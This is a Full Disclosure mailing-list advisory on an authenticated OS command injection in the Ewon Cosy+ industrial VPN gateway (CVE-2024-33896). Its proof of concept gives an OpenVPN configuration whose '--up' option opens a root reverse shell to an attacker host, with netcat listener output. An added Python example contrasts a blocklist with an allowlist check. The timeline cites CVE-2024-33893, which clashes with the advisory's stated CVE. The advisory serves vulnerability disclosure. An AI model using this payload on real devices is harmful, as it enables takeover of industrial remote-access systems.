Message-ID: <078a2c6f-1764-4625-8a70-537242a56673@syss.de>
Date: Sun, 11 Aug 2024 19:47:30 +0200
From: Moritz Abrell via Fulldisclosure <fulldisclosure@...lists.org>
To: <fulldisclosure@...lists.org>
Subject: [FD] Improper Neutralization of Special Elements used in an OS
 Command ('OS Command Injection') (CWE-78) CVE-2024-33896

Advisory ID:               SYSS-2024-018
Product:                   Ewon Cosy+
Manufacturer:              HMS Industrial Networks AB
Affected Version(s):       Firmware Versions: < 21.2s10 and < 22.1s3
Tested Version(s):         Firmware Version: 21.2s7
Vulnerability Type:        Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78)
Risk Level:                Medium
Solution Status:           Fixed
Manufacturer Notification: 2024-03-27
Solution Date:             2024-07-18
Public Disclosure:         2024-08-11
CVE Reference:             CVE-2024-33896
Author of Advisory:        Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between
the machine (PLC, HMI, or other devices) and the remote engineer.
The connection happens through Talk2m, a highly secured industrial
cloud service. The Ewon Cosy+ makes industrial remote access easy
and secure like never before!"

Due to improper neutralization of parameters read from a user-controlled
configuration file, an authenticated attacker is able to inject and execute
OS commands on the device.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Authenticated attackers are able to upload a custom OpenVPN configuration.
This configuration can contain the OpenVPN parameters "--up" and "--down",
which execute a specified script or executable.

Since the process itself runs with the highest privileges (root),
this allows the device to be completely compromised.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Generate a malicious OpenVPN configuration, e.g. instructing the device
     to create a reverse shell:

     client
     dev tun
     persist-tun
     proto tcp
     verb 5
     mute 20
     --up '/bin/sh -c "TF=$(mktemp -u);mkfifo $TF;telnet <attacker-ip> 5000 0<$TF | sh 1>$TF"'
     script-security 2
         [...]

2. Start a listener on the attacker system:
     #> nc -lvp 5000

3. Upload the OpenVPN configuration via FTP to Cosy+.

4. Set the configuration parameter "VPNCfgFile" to "/usr/<vpnfile>".

5. Command is executed by Cosy+ and a reverse shell is initiated:

     nc -lvp 5000
     Listening on 0.0.0.0 5000
     Connection received on 192.168.10.240 56806
     id
     uid=0(root) gid=0(root)


Note:
     The parameters "--up" and "--down" need to be specified with
     two dashes since the values "up" and "down" are blocklisted on the
     device.
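
Added example (not part of the advisory, and not HMS or SySS code): an
exact-match blocklist on "up"/"down" compared with an allowlist check on
normalized directive names, since OpenVPN drops a leading "--" from option
names read from a configuration file. The allowlist contents, the function
names and the sample configuration (benign placeholder path) are assumptions.

```python
# Constructed sample config; the script path is a benign placeholder.
SAMPLE = """\
client
dev tun
proto tcp
--up /usr/placeholder.sh
script-security 2
"""

# The blocklist behaviour the advisory's note describes.
BLOCKED = {"up", "down"}

# Assumed allowlist: only directives a plain client profile needs.
# Anything else (scripts, plugins, inline blocks) is rejected, i.e. fail closed.
ALLOWED = {"client", "dev", "persist-tun", "persist-key", "proto",
           "remote", "nobind", "verb", "mute"}


def first_token(line):
    """Return the directive name on a config line, or None for blanks/comments."""
    stripped = line.strip()
    if not stripped or stripped[0] in "#;":
        return None
    return stripped.split()[0]


def naive_blocklist(config):
    """Exact match on the raw token: the kind of check that '--up' slips past."""
    tokens = (first_token(line) for line in config.splitlines())
    return [tok for tok in tokens if tok in BLOCKED]


def normalize(token):
    """Mirror OpenVPN's handling: a leading '--' on an option name is dropped."""
    return token[2:] if token.startswith("--") and len(token) >= 3 else token


def allowlist_audit(config):
    """Return (line_no, raw_token) for every directive not on the allowlist."""
    findings = []
    for line_no, line in enumerate(config.splitlines(), 1):
        token = first_token(line)
        if token is not None and normalize(token) not in ALLOWED:
            findings.append((line_no, token))
    return findings


if __name__ == "__main__":
    print("blocklist hits:", naive_blocklist(SAMPLE))
    print("allowlist findings:", allowlist_audit(SAMPLE))
```

The blocklist reports nothing for the sample, while the allowlist audit
flags both the "--up" line and "script-security".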

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

According to the manufacturer note[4], the vulnerability was fixed
with the firmware versions 21.2s10 and 22.1s3.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-03-26: Vulnerability discovered
2024-03-27: Vulnerability reported to manufacturer
2024-04-02: Inquiry about the status
2024-04-05: Manufacturer acknowledged the vulnerability and started the
             analysis
2024-04-10: Two more vulnerabilities reported to the manufacturer
             (SYSS-2024-032 and SYSS-2024-033)
2024-04-11: Manufacturer acknowledged the vulnerabilities and asked for
             a publication date for all findings
2024-04-12: Proposed dates for a discussion about publication
2024-04-15: Manufacturer sent a technical overview of planned remediation
             actions and details about the planned timeline
2024-04-15: Acknowledged the remediation actions and asked the manufacturer
             for assigning a CVE ID
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer
2024-05-31: Manufacturer informed that the fix is in completion stage and
             asked if the blog post[6] can be reviewed by HMS
2024-06-04: Proposed dates to review the blog post draft
2024-06-21: Inquiry about the status
2024-06-21: Received an out-of-office auto reply
2024-07-01: Inquiry about the status
2024-07-04: Inquiry about the status
2024-07-12: Inquiry about the status and letting the manufacturer know that
             the vulnerability will be published within a talk at DEF CON[7]
             in August
2024-07-12: Manufacturer responded that the fix is planned by the end of
             July; manufacturer asked again for reviewing the blog post
             draft
2024-07-12: Again confirmed reviewing the blog post is possible and asking
             for the sending of details
2024-07-17: Blog post provided to HMS
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS
2024-07-23: Inquiry about the status
2024-07-23: Manufacturer reviewed the blog post and confirmed that a
             fix is provided
2024-07-29: Discussion with HMS about the blog post and final publication
             actions
2024-08-11: Vulnerability disclosed at DEF CON[7]
2024-08-11: Blog post published[6]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Ewon Cosy+ product website
     https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet
[2] SySS Security Advisory SYSS-2024-018
     https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-018.txt
[3] SySS Responsible Disclosure Policy
     https://www.syss.de/en/responsible-disclosure-policy
[4] Manufacturer note
     https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001--ewon-several-cosy--vulnerabilities.pdf
[5] CVE-2024-33896
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33896
[6] Blog post
     https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/
[7] DEF CON talk
     https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:moritz.abrell@...s.de
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL:http://creativecommons.org/licenses/by/3.0/deed.en